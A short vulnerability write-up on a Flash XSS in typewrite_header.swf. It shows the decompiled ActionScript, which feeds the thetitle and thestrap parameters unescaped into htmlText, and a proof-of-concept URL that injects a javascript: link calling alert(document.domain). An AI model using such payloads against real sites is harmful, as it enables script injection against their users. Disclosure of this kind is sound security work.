Flash XSS on typewrite_header.swf
Our lab found a interesting XSS on a .swf file that we later discover was mainly used on phishing websites.
Source code of typewrite_header.swf:
//----------------------------------------------------------------------
//Frame 3
//----------------------------------------------------------------------
gotoAndPlay (2);
//----------------------------------------------------------------------
//Frame 1
//----------------------------------------------------------------------
var q = 1;
var myurl = "http://xxxxxxxxxxxxxxxxxxxxxxxxx/";
var mytext1 = _root.thetitle;
var mytext2 = _root.thestrap;
_global.mytext = (("" + mytext1) + "
") + mytext2;
//----------------------------------------------------------------------
//Frame 2
//----------------------------------------------------------------------
if (q <= mytext.length) {
textbox.htmlText = mytext.substring(0, q);
q++;
} else {
textbox = mytext;
gotoAndStop (1);
}So we have two parameters: thetitle and thestrap.
Proof-of-concept:
typewrite_header.swf?thetitle=%3Ca%20href=%27javascript:alert%28document.domain%29%27%3EClick%20me%3C/a%3E&thestrap=xss2 (which will need a click from the user to run the XSS payload)
For more information about Flash XSS please visit https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_%28OTG-CLIENT-008%29
// David Sopas